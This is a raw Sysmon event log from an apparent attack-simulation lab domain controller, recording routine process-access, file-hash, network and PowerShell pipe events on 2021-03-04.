14:07:35.221{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203149Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:35.221{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203148Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:35.221{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203154Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:36.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B2389DBD793BF93779B90A752A3BBFC,SHA256=5E33AACF2AB2320028B9F4E347D64C33AB38BE075B4C1BB8A5120CB86F0DBFE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203153Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:36.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AE9C1DD35F97F187DD4697477F2AE8B,SHA256=7CF6DBEF5028ECE02711FC4874F111D74BA05475D54E25CC7A7CA2C920E07241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203152Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:36.612{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3054B09044BCC4729347812977B569B,SHA256=D8A176E1D45404A50D0FAFE8A2A462C2EB75C78FA2F8B2C2CF3FF133120B30F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203157Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:33.885{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60697-false10.0.1.12-8000- 354300x80000000000000002203156Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:33.494{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55279- 23542300x80000000000000002203155Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:37.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2739AD1A289C731D7DAE9CC4D7A9EB9F,SHA256=231B8FFB025B9C268D51078319075E338473060A0053713C84784978E119B77D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203159Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:34.510{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55279- 23542300x80000000000000002203158Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:38.674{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A8F8F17485CD6EE220DD71FCF453AA,SHA256=CEA2556E343DEC0FC82DAB9EC0D5DA71D8855D97057BD12E016DA382962A7384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203160Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:39.690{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7022D89ACCA585BB728105C0D24D8DF,SHA256=BCA2E5500AAA19FD27C2D9964C80398897D2302156BE66328EBA8C57A17DCA40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203162Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:40.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46064142FA299445D59113CB2D348417,SHA256=441AE541D6CA412518FA69046D8C0AD6B84318FBCB3A8FAFC69EFA812F2E7C1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203161Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:40.315{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B2389DBD793BF93779B90A752A3BBFC,SHA256=5E33AACF2AB2320028B9F4E347D64C33AB38BE075B4C1BB8A5120CB86F0DBFE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203163Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:41.721{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2618546C9802BAA13BA7DB3E2A8F8BC4,SHA256=87EF7A581EF13812834082F8781DBF421BB0CEB23EDD082D9D836E33BB92D2F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203164Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:42.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3CCB8B9028A72A64A294F6E62466109,SHA256=9ABDA1CC3F7998744EE7FB33BB0FD0590C834361EB353927B470741F53267330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203166Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:43.768{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C687119C59C021B8947D442D6FE4485C,SHA256=BF0CD942463116F757677D811190EF3BC2004AA8E927DA54BF6F41ECE9D26F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203165Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:43.143{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83B824617E6A00947202BADF29A6E1DD,SHA256=8D5C012F7CF42BBA5A83C976F3176BC257A2915B711A9944AACFF8281E805456,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203169Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:39.948{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60699-false10.0.1.12-8000- 23542300x80000000000000002203168Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:44.799{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50257A0EB3C4D0F4836B204539FB48C1,SHA256=63FD616EBD4127142BF6CC44258DDDCCCED69C6034FAF03AAFABA031C3602A19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203167Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:44.705{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4E6009AA095B3456637C49139A2CDF8,SHA256=0017C1EEECCFE0B4C3028ED6205B30B175C7A807CE39FC913F584A5B886EF3FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203170Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:45.846{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED48C4365DE5938915974D652D839202,SHA256=8E44DB18DF5702318FAE7044783325D2199325E2F62F8F064A583E28A7F7551F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203171Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:46.862{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F4BE0F8F509CB19331286BCA17C2531,SHA256=8C47A224EDE569AD409FF3C8959EB7ACE5E034F496C21EE0EA9D17D8D8DA5D78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203240Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.940{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203239Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.940{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203238Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.909{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203237Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.909{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203236Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:07:47.893{5ABCFE62-E9B3-6040-454E-00000000AD01}5468\PSHost.132593404678345247.5468.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203235Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.877{5ABCFE62-E9B3-6040-454E-00000000AD01}5468ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_0kz5vmf4.ieh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203234Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.877{5ABCFE62-E9B3-6040-454E-00000000AD01}5468ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4w1vae2r.iao.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203233Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.862{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4w1vae2r.iao.ps12021-03-04 14:07:47.862 23542300x80000000000000002203232Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.862{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB95F044E7A3421A9B266B8B998A299A,SHA256=7A2A8CC6D9A7464CA00C2CE22C05270D5DCA7B03EF1FDAD6068EA800D1F2D143,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203231Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.862{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203230Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203229Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203228Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203227Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203226Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203225Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203224Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.830{5ABCFE62-99F1-603E-7907-00000000AD01}30802060C:\Windows\system32\csrss.exe{5ABCFE62-E9B3-6040-454E-00000000AD01}5468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203223Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 